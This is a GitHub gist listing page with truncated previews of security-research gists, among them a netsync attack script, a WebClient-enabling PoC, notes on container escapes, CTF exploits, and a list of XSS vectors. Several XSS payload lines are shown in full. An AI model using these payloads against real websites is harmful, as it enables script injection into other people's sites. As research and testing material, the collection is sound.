Skip to content

Instantly share code, notes, and snippets.

View laxa's full-sized avatar

Julien EGLOFF laxa

149 followers · 49 following
View GitHub Profile
@ThePirateWhoSmellsOfSunflowers
ThePirateWhoSmellsOfSunflowers / netdumper.py
Last active July 1, 2025 14:39
This script perform a netsync attack. No SMB involved
from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr
from impacket.uuid import bin_to_uuidtup
from impacket.crypto import SamDecryptNTLMHash
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.dcerpc.v5.rpcrt import DCERPCException
from binascii import unhexlify, hexlify
from random import randbytes
import sys
import argparse
@adiroiban
adiroiban / list_shares.py
Last active September 25, 2025 09:02
List all shares on remote Windows server using smbprotocol
# Conversion of pysmb code to smbprotocol
# Original code at
# https://github.com/miketeo/pysmb/blob/76dc1708007fdcdd9d96a3703910938b84691704/python3/smb/base.py#L413-L548
#
import binascii
import uuid
import pprint
import struct
from smbprotocol.connection import Connection
@klezVirus
klezVirus / EtwStartWebClient.cs
Last active October 30, 2025 13:23
A PoC in C# to enable WebClient Programmatically
using System.Runtime.InteropServices;
using System;
/*
* Simple C# PoC to enable WebClient Service Programmatically
* Based on the C++ version from @tirannido (James Forshaw)
* Twitter: https://twitter.com/tiraniddo
* URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
*
* Compile with:
@adulau
adulau / ghidra-community.md
Last active November 11, 2023 13:16
Ghidra community - collection
@FrankSpierings
FrankSpierings / README.md
Last active November 4, 2025 21:29
Linux Container Escapes and Hardening
@SouhailHammou
SouhailHammou / ndh2017_step4.py
Last active May 15, 2023 17:33
from idc import *
from ctypes import c_uint32
def bruteforce_word(dword1,dword2):
for i in range(0,256) :
for j in range(0,256) :
k = 0
result = c_uint32(0xffffffff)
while k < 2 :
if k == 0 :
@hugsy
hugsy / gef-exploit.py
Last active March 24, 2021 06:03
#!/usr/bin/env python
#
# ASIS CTF 2016
# feap
#
# @_hugsy_
#
# $ ./gef-exploit.py (13:55)
# [+] Connected to feap.asis-ctf.ir:7331
# [+] Leaking addresses
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@adamloving
adamloving / temporary-email-address-domains
Last active December 10, 2025 15:36
A list of domains for disposable and temporary email addresses. Useful for filtering your email list to increase open rates (sending email to these domains likely will not be opened).
0-mail.com
0815.ru
0clickemail.com
0wnd.net
0wnd.org
10minutemail.com
20minutemail.com
2prong.com
30minutemail.com
3d-painting.com
@UniIsland
UniIsland / SimpleHTTPServerWithUpload.py
Created August 14, 2012 04:01
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""